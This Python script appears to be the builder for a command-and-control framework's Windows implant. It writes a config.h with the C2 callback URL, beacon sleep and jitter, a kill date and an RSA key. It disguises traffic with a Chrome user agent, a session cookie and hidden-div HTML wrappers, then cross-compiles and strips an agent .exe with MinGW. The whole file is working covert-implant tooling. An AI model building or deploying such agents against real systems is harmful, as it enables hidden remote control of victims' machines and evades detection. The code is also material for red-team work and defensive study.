#!/usr/bin/env python3
"""
Build script for generating a configured C agent .exe via MinGW cross-compilation.

Generates a config.h with embedded C2 settings and RSA public key,
then invokes x86_64-w64-mingw32-gcc to produce the agent binary.

Usage (standalone):
  python build_agent_c.py \
    --listener-url https://c2.example.com/api/v1 \
    --rsa-pubkey keys/server_pub.pem \
    --sleep 60 --jitter 25 \
    --output builds/agent.exe

Usage (from operator shell):
  generate --url https://... --sleep 60 --jitter 25
"""

import argparse
import os
import shutil
import subprocess
import sys
from datetime import datetime
from pathlib import Path

sys.path.insert(0, str(Path(__file__).parent.parent))


def check_mingw():
    """Check if MinGW cross-compiler is available."""
    for cc in ["x86_64-w64-mingw32-gcc", "i686-w64-mingw32-gcc"]:
        if shutil.which(cc):
            return True
    return False


def extract_rsa_components(pubkey_path: Path) -> tuple:
    """Extract RSA modulus and exponent from a PEM public key file."""
    from cryptography.hazmat.primitives.serialization import load_pem_public_key
    from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey

    pem_data = pubkey_path.read_bytes()
    pub_key = load_pem_public_key(pem_data)
    if not isinstance(pub_key, RSAPublicKey):
        raise ValueError("Not an RSA public key")

    numbers = pub_key.public_numbers()
    modulus = numbers.n
    exponent = numbers.e

    # Convert to bytes (big-endian)
    mod_bytes = modulus.to_bytes((modulus.bit_length() + 7) // 8, 'big')
    exp_bytes = exponent.to_bytes((exponent.bit_length() + 7) // 8, 'big')

    return mod_bytes, exp_bytes


def generate_config_h(
    output_path: Path,
    listener_url: str,
    sleep_ms: int,
    jitter_pct: int,
    kill_date_unix: int,
    magic: int,
    cookie_name: str,
    uri_path: str,
    user_agent: str,
    wrapper_before: str,
    wrapper_after: str,
    rsa_modulus: bytes,
    rsa_exponent: bytes,
):
    """Generate a config.h with embedded build-time values."""

    def bytes_to_c_array(data: bytes) -> str:
        return ", ".join(f"0x{b:02X}" for b in data)

    config = f'''/*
 * config.h — Auto-generated by build_agent_c.py
 * Generated: {datetime.utcnow().isoformat()}Z
 */
#ifndef CONFIG_H
#define CONFIG_H

#define CONFIG_C2_URL       "{listener_url}"
#define CONFIG_SLEEP_MS     {sleep_ms}
#define CONFIG_JITTER_PCT   {jitter_pct}
#define CONFIG_KILL_DATE    {kill_date_unix}
#define CONFIG_MAGIC        0x{magic:08X}
#define CONFIG_AGENT_VER    "1.0.0"

#define CONFIG_COOKIE_NAME  "{cookie_name}"
#define CONFIG_URI_PATH     "{uri_path}"
#define CONFIG_USER_AGENT   "{user_agent}"

#define CONFIG_RESP_WRAPPER_BEFORE  "{wrapper_before}"
#define CONFIG_RESP_WRAPPER_AFTER   "{wrapper_after}"

static const unsigned char RSA_MODULUS[] = {{
    {bytes_to_c_array(rsa_modulus)}
}};
static const unsigned int RSA_MODULUS_LEN = {len(rsa_modulus)};

static const unsigned char RSA_EXPONENT[] = {{
    {bytes_to_c_array(rsa_exponent)}
}};
static const unsigned int RSA_EXPONENT_LEN = {len(rsa_exponent)};

#endif /* CONFIG_H */
'''
    output_path.write_text(config)


def build_agent(
    project_root: Path,
    listener_url: str = "https://127.0.0.1:8443/api/v1",
    rsa_pubkey_path: Path = None,
    sleep_sec: int = 60,
    jitter_pct: int = 25,
    kill_date: str = "",
    magic: int = 0xDEADF00D,
    arch: str = "x64",
    output_path: Path = None,
    profile_path: Path = None,
) -> Path:
    """
    Build a configured C agent.
    Returns the path to the compiled .exe.
    """
    agent_src = project_root / "agent_c"

    if not agent_src.exists():
        raise FileNotFoundError(f"Agent source not found: {agent_src}")

    # Load profile for HTTP settings
    cookie_name = "session"
    uri_path = "/api/v1"
    user_agent = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
    wrapper_before = '<html><body><div style=\\"display:none\\">\\n'
    wrapper_after = '\\n</div></body></html>\\n'

    if profile_path and profile_path.exists():
        from client.profiles.parser import load_profile
        profile = load_profile(profile_path)

        if profile.request_embedding:
            cookie_name = profile.request_embedding.param_name
        if profile.uri_paths:
            uri_path = profile.uri_paths[0]
        req_headers = getattr(profile, "request_headers", {})
        if "User-Agent" in req_headers:
            user_agent = req_headers["User-Agent"]
        # Use wrapper strings from profile if available
        resp_emb = profile.response_embedding
        if hasattr(resp_emb, "wrapper_before") and resp_emb.wrapper_before:
            wb = resp_emb.wrapper_before.replace('"', '\\"').replace('\n', '\\n')
            wrapper_before = wb
        if hasattr(resp_emb, "wrapper_after") and resp_emb.wrapper_after:
            wa = resp_emb.wrapper_after.replace('"', '\\"').replace('\n', '\\n')
            wrapper_after = wa

    # RSA key
    rsa_modulus = b'\x00'
    rsa_exponent = b'\x01\x00\x01'

    if rsa_pubkey_path and rsa_pubkey_path.exists():
        rsa_modulus, rsa_exponent = extract_rsa_components(rsa_pubkey_path)

    # Kill date
    kill_date_unix = 0
    if kill_date:
        try:
            dt = datetime.strptime(kill_date, "%Y-%m-%d")
            kill_date_unix = int(dt.timestamp())
        except ValueError:
            pass

    # Create build directory with a copy of sources
    build_dir = project_root / "builds" / "agent_c_tmp"
    if build_dir.exists():
        shutil.rmtree(build_dir)
    shutil.copytree(agent_src, build_dir)

    # Generate config.h
    config_path = build_dir / "include" / "config.h"
    generate_config_h(
        config_path,
        listener_url=listener_url,
        sleep_ms=sleep_sec * 1000,
        jitter_pct=jitter_pct,
        kill_date_unix=kill_date_unix,
        magic=magic,
        cookie_name=cookie_name,
        uri_path=uri_path,
        user_agent=user_agent,
        wrapper_before=wrapper_before,
        wrapper_after=wrapper_after,
        rsa_modulus=rsa_modulus,
        rsa_exponent=rsa_exponent,
    )

    # Determine output path
    if not output_path:
        output_path = project_root / "builds" / f"agent_{arch}.exe"
    output_path.parent.mkdir(parents=True, exist_ok=True)

    # Select compiler
    if arch == "x64":
        cc = "x86_64-w64-mingw32-gcc"
        strip = "x86_64-w64-mingw32-strip"
    else:
        cc = "i686-w64-mingw32-gcc"
        strip = "i686-w64-mingw32-strip"

    if not shutil.which(cc):
        raise FileNotFoundError(
            f"{cc} not found. Install mingw-w64:\n"
            f"  sudo apt install mingw-w64"
        )

    # Compile
    src_files = list((build_dir / "src").glob("*.c"))
    cmd = [
        cc,
        f"-I{build_dir / 'include'}",
        "-Wall", "-Os", "-s",
        "-fno-asynchronous-unwind-tables", "-fno-ident",
        "-DWIN32_LEAN_AND_MEAN", "-D_WIN32_WINNT=0x0603",
        "-o", str(output_path),
    ] + [str(f) for f in src_files] + [
        "-lbcrypt", "-lwinhttp", "-ladvapi32", "-lkernel32", "-lntdll",
        "-static-libgcc", "-Wl,--subsystem,console",
    ]

    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(f"Compilation failed:\n{result.stderr}")

    # Strip symbols
    if shutil.which(strip):
        subprocess.run([strip, str(output_path)], capture_output=True)

    # Cleanup temp build dir
    shutil.rmtree(build_dir, ignore_errors=True)

    return output_path


def parse_args():
    p = argparse.ArgumentParser(description="Build configured C agent")
    p.add_argument("--listener-url", default="https://127.0.0.1:8443/api/v1")
    p.add_argument("--rsa-pubkey", type=Path, default=None)
    p.add_argument("--profile", type=Path, default=None)
    p.add_argument("--sleep", type=int, default=60, help="Sleep interval in seconds")
    p.add_argument("--jitter", type=int, default=25, help="Jitter percentage (0-99)")
    p.add_argument("--kill-date", default="", help="Kill date (YYYY-MM-DD)")
    p.add_argument("--magic", default="0xDEADF00D")
    p.add_argument("--arch", choices=["x64", "x86"], default="x64")
    p.add_argument("--output", type=Path, default=None)
    return p.parse_args()


def main():
    args = parse_args()
    project_root = Path(__file__).parent.parent

    magic = int(args.magic, 16) if args.magic.startswith("0x") else int(args.magic)

    # Auto-find RSA key
    rsa_path = args.rsa_pubkey
    if not rsa_path:
        default_rsa = project_root / "keys" / "server_pub.pem"
        if default_rsa.exists():
            rsa_path = default_rsa

    try:
        exe_path = build_agent(
            project_root,
            listener_url=args.listener_url,
            rsa_pubkey_path=rsa_path,
            sleep_sec=args.sleep,
            jitter_pct=args.jitter,
            kill_date=args.kill_date,
            magic=magic,
            arch=args.arch,
            output_path=args.output,
            profile_path=args.profile,
        )
        size_kb = exe_path.stat().st_size / 1024
        print(f"[+] Agent built: {exe_path} ({size_kb:.1f} KB)")
    except FileNotFoundError as e:
        print(f"[!] {e}")
        sys.exit(1)
    except RuntimeError as e:
        print(f"[!] {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()
